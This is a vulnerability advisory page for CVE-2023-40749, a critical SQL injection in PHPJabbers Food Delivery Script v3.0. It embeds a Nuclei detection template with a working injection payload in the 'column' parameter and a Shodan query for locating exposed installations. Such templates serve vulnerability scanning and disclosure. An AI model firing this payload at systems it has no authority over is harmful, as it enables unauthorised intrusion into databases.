CVE-2023-40749: PHPJabbers Food Delivery Script v3.0 - SQL Injection

日期: 2025-08-01 | 影响软件: PHPJabbers Food Delivery Script v3.0 | POC: 已公开

漏洞描述

PHPJabbers Food Delivery Script v3.0 is vulnerable to SQL Injection in the "column" parameter of index.php.

PoC代码[已公开]

id: CVE-2023-40749

info:
  name: PHPJabbers Food Delivery Script v3.0 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    PHPJabbers Food Delivery Script v3.0 is vulnerable to SQL Injection in the "column" parameter of index.php.
  reference:
    - https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40749
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-40749
    cwe-id: CWE-89
    epss-score: 0.26462
    epss-percentile: 0.96151
    cpe: cpe:2.3:a:phpjabbers:food_delivery_script:3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"PHPJabbers"
    vendor: phpjabbers
    product: food_delivery_script
  tags: cve,cve2023,phpjabbers,food-delivery,sqli

http:
  - method: POST
    path:
      - "{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d’’%26type%3d"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "class <strong>pjAdminOrdersaction"
          - "didn't exists"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205bc525758f663243332aeead9d3d85e3a3e265c8b57c1e046ed61ab08a875140022007d0967147f02ab45757cf8de8974e1e95543cb66faf29536a6dc2f981979680:922c64590222798bb761d5b6d8e72950

相关漏洞推荐